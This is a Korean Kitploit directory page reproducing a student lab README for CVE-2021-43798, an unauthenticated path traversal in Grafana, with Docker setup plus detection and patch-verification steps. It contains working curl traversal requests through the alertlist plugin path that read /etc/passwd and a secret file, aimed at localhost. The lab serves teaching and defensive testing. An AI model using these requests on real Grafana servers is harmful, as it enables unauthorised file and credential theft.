Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
-INE_Shivam_Gupta_23104003 — CVE-2021-43798 Grafana 인증되지 않은 경로 순회 - 보안 연구소 | Shivam Gupta | 23104003 | Kitploit
도구/GitHubGitHub/shivamg2004/-ine_shivam_gupta_23104003
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & EducationLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
shivamg2004/-ine_shivam_gupta_23104003

-INE_Shivam_Gupta_23104003

CVE-2021-43798 Grafana 인증되지 않은 경로 순회 - 보안 연구소 | Shivam Gupta | 23104003

저장소 보기
6시간 56분 전아직 검토되지 않음

CVE-2021-43798 — Grafana 인증되지 않은 경로 순회 실습

교육용으로만 사용하세요. 이 실습은 격리된 로컬 머신에서만 실행하세요. 절대 인터넷에 노출하지 마세요.


CVE 요약

필드세부 정보
CVE IDCVE-2021-43798
제품Grafana
영향받는 버전8.0.0 – 8.3.0
패치된 버전8.3.1+
심각도높음
CVSS v3.1 점수7.5
CWECWE-22 — 경로 순회
인증 필요 여부없음
공격 벡터네트워크

사전 요구 사항

  • Docker Desktop (실행 중)
  • Git
  • curl

설정

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta

취약한 환경 시작

root@kitploit:~
docker compose up -d

확인:

root@kitploit:~
curl http://127.0.0.1:3000/api/health
# Expected: "version": "8.3.0"

http://127.0.0.1:3000 을 여세요 — 로그인: admin / admin


취약점 악용

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"

예상 결과: 인증 없이 HTTP 200과 함께 파일 내용이 반환됩니다.


탐지

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health

hostname이 반환되면 → 취약함. 버전 8.0.0–8.3.0 → 취약함.


완화 조치

패치된 인스턴스(Grafana 8.3.1) 시작:

root@kitploit:~
docker compose -f docker-compose.patched.yml up -d

악용이 차단되었는지 확인:

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Expected: {"message": "Plugin file not found"}

실습 중지

root@kitploit:~
docker compose down
docker compose -f docker-compose.patched.yml down

참고 자료

  • https://nvd.nist.gov/vuln/detail/CVE-2021-43798
  • https://grafana.com/blog/2021/12/07/grafana-8.3.1-and-7.5.12-released-with-moderate-severity-security-fix/
  • https://cwe.mitre.org/data/definitions/22.html
도구 다운로드